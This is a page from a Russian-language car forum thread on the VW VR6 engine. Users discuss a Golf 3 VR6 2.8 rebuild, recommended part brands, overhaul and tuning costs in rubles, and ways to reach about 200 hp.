+ Ответить в теме
Страница 6 из 6 ПерваяПервая ... 4 5 6
Показано с 51 по 59 из 59

Тема: VR6

GTI-Racing S@TURN will become famous soon enough Аватар для S@TURN
    Машина
    vr6 color concept - sold, а4 2.5tdi куатро!-sold, EOS - недопережитиай.
    2anst а территориально где находишься? по электрике какнибудь посл восстановления я бы подъехал за помощью
    NON LIMITUS HOMICUS DOLBOEBICUS
    (нет предела человеческой глупости)

Мимо проходил anst is on a distinguished road Аватар для anst
    район "бибирево"

Мимо проходил vanila is on a distinguished road Аватар для vanila
    <_< Я вот хочу на свой вр6 нитруху поставить интересно только кто погибнет быстрее я или мой сцука мощный двиган

GTI-Racing Igorb will become famous soon enough Igorb will become famous soon enough Аватар для Igorb
    Машина
    golf_mk1
    передний бампер и капот с оптикой погибнет быстрее по статистике.
    back in the days where motorsport was organised by real men with hairy chests who didn`t give a hoot about health and safety

Overload http://overload.net.ua/forum/viewtop...d0f88ef70d72f2

Мимо проходил Bandit is on a distinguished road Аватар для Bandit
    Собираюсь делать полный капитальный ремонт с заменой скорей всего поршней, колец, вкладышей всех, сальники, прокладки и т.д. Нужна любая информация по данному делу&#33; Может кто-то делал, какие нюансы, какой бюджет у кого вышел? Вообщем интересует любая информация по переборке мотора VR6 2.8 Golf3
    Еще также интересует шлифовка бошки, если надо расточко блока, хонинговка(что чего как), замена клапанов, калпачков и т.д.? На сколько хватит ресурса мотора после качественной переборки?
    Просьба описать какой фирмы брать данные детали лучше всего?
    Заранее очень благодарен за ответы&#33;

Мимо проходил Horogan is on a distinguished road Аватар для Horogan
    [quote name=&#39;Bandit&#39; date=&#39;Sep 24 2006, 15:19&#39; post=&#39;13684&#39;]
    Собираюсь делать полный капитальный ремонт с заменой скорей всего по

По запчастям: прокладки - VictorReinz, поршня Kolbenshmit, вкладыши - оригинал, ну а по остальному по-хорошему тоже оригинал. От Febi и Elring я бы отказался, хотя сейчас ими все прилавки забиты

Хотел узнать, что можно сделать, чтобы снять 200 лс ?, блок был расточен под 2,9

GTI-Racing Мурзик is on a distinguished road Аватар для Мурзик
    Ковка с изготовлением, кольца, расточка, хонинговка, ремонт головки, разборка-сборка (без снятия-установки) - обошлась примерно в 40000р. Плюс гарантия - 20000км.
    Запчасти: прокладки, цепи, успокоители, клапана и т.д. - примерно в 20-25000р., хотя особо не считал, финансы позволяли.

Доработка валов в "Динамике" (9000р.), установка выпуска (обошлась примерно в 35000р.), чип (хз сколько это стоит сейчас и где его делать) возможно приблизит к желаемым 200 силам. По крайней мере, прибавка ощутима.

Возможно, если всё делать с головой и сразу в нормальной конторе, можно уложиться и в меньшие деньги. Мне в своё время с этим не очень повезло и название АБ"Инжиниринг" я буду вспоминать ещё очень долго.

+ Ответить в теме
Страница 6 из 6 ПерваяПервая ... 4 5 6

Ваши права